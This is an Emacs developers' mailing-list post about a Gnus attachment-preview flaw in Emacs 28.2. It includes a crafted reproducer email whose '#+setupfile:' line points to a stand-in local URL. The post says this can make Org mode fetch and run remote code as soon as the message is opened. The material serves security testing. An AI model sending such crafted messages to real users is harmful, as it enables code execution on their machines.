From: Max Nikulin <manikulin@gmail.com>
To: "emacs-devel@gnu.org" <emacs-devel@gnu.org>
Cc: Sean Whitton <spwhitton@spwhitton.name>
Subject: Re: Reproducers for recent Emacs security issues
Date: Tue, 16 Apr 2024 11:35:50 +0700 [thread overview]
Message-ID: <46e44c5c-47e0-4bfd-b90d-ad8a3f82b33d@gmail.com> (raw)
In-Reply-To: <8734rmmcfg.fsf@ust.hk>
On 16/04/2024 06:30, Andrew Cohen wrote:
>>>>>> "FW" == Florian Weimer writes:
> FW> It's a feature.
[...]
> I stand corrected---this still looks quite useful and seems to be
> working as intended.
I am not trying to dispute that attachment preview is a useful feature
and it is nice to have syntax highlight. I still believe, its
implementation is buggy and behavior may confuse those who test fixes
for the recent security vulnerabilities.
Consider the following message:
---- 8< ----
To: A User <a.user@example.com>
From: Attacker <attacker@example.org>
Subject: Gnus inline attachment preview is buggy
Date: Mon, 15 Apr 2024 17:47:53 +0000
Message-ID: <123@example.org>
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------si3r85hbIUHz9WH"
This is a multi-part message in MIME format.
--------------si3r85hbIUHz9WH
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* The *following* line should not affect attachment preview:
#+setupfile: http://localhost:8000/setup-1234567890.org
- =text/plain= body :: should not be fonified as an Org mode buffer.
--------------si3r85hbIUHz9WH
Content-Type: text/x-org; charset=UTF-8; name="test.org"
Content-Disposition: attachment; filename="test.org"
Nothing dangerous or suspicious here.
--------------si3r85hbIUHz9WH--
---- >8 ----
Message body should be presented as plain text and its content should
not affect attachment and should not be interpreted as Org mode markup.
What I see in Emacs-28.2 is that text/plain message body is fontified as
an Org mode buffer, even "#+setupfile:" is interpreted by Org mode code.
I do not mind that the attachment is invisible when I open the message.
What I really do not like is that some code is executed for invisible
content. The attachment should be rendered when the user opens it, not
when the message is opened.
In Emacs-28.2 a *folded* *attachment* may cause interpretation of
"#+setupfile:" in the text/plain *body* as Org markup and may lead to
execution of arbitrary code downloaded from a remote site immediately
when user opens message without additional user actions.
From my point of view, *risk* of an attack requiring opening an
attachment is significantly lower than one when it is enough to just
open mail message. I admit that *impact* measured using Common
Vulnerability Scoring System (CVSS) v3.1 is the same. In both cases user
action is required.
next prev parent reply other threads:[~2024-04-16 4:35 UTC|newest]
Thread overview: 15+ messages / expand[flat|nested] mbox.gz Atom feed top
2024-04-14 3:23 Reproducers for recent Emacs security issues Sean Whitton
2024-04-14 4:41 ` Max Nikulin
2024-04-15 9:27 ` Sean Whitton
2024-04-15 9:32 ` Ihor Radchenko
2024-04-15 9:46 ` Sean Whitton
2024-04-15 10:09 ` Ihor Radchenko
2024-04-15 11:20 ` Max Nikulin
2024-04-15 12:00 ` Ihor Radchenko
2024-04-15 13:42 ` Andrew Cohen
2024-04-15 18:33 ` Florian Weimer
2024-04-15 23:30 ` Andrew Cohen
2024-04-16 4:35 ` Max Nikulin [this message]
2024-04-16 12:25 ` Eli Zaretskii
2024-04-16 13:23 ` Andrew Cohen
2024-04-17 14:31 ` Max Nikulin
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
List information: https://www.gnu.org/software/emacs/
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=46e44c5c-47e0-4bfd-b90d-ad8a3f82b33d@gmail.com \
--to=manikulin@gmail.com \
--cc=emacs-devel@gnu.org \
--cc=spwhitton@spwhitton.name \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
Code repositories for project(s) associated with this public inbox
https://git.savannah.gnu.org/cgit/emacs.git
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for read-only IMAP folder(s) and NNTP newsgroup(s).